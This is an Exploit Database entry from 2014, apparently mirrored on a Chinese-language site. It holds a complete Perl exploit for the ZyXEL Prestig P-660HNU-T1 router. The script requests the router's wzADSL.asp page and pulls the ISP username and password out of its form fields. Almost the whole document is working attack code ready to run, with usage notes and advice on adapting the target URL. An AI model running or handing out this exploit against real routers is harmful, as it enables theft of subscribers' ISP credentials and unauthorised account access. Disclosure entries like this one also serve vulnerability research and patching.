ZYXEL Prestig P-660HNU-T1 – ISP Credentials Disclosure

• Exploit Database
• 21 阅读

• 作者： Sebastián Magof
  日期： 2014-09-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34751/

• #!/usr/bin/perl 
  # Exploit Author: Sebastián Magof 
  # Hardware: ZyXEL Prestig P-660HNU-T1
  # Vulnerable file: wzADSL.asp
  # location: http://gateway/cgi-bin/wzADSL.asp
  # Bug: ISP usr+pwd disclosure 
  # Type: Local 
  # Date: 22/09/2014
  # Vendor Homepage: http://www.zyxel.com/
  # Version: 2.00(AAIJ.1)
  # Tested on: Linux Fedora 20/Windows 7
  # (\/)
  # (**) Alpha (:
  #(")(")
  #usage:perl exploit.pl
  use LWP::UserAgent;
  use HTTP::Request;
  #begin
  print "\n\n************************************************************\n";
  print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) 
  print "************************************************************\n\n";#in oher country modify $url line 25
  
   
  #isp pwd disclosure file
  my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
  
   
  #UserAgent
  my $ua = LWP::UserAgent->new();
  $ua->agent("Mozilla/5.0");
  
   
  #Request.
  my $req = HTTP::Request->new(GET => $url);
  my $request = $ua->request($req);
  my $content = $request->content(); #content
  my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
  my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
  #ISP usr+pwd Arnet Telecom Argentina;
  print "User: $usr\n";
  print "Password: $pwd\n\n";
  exit(0);
   
   
   
  __EOF__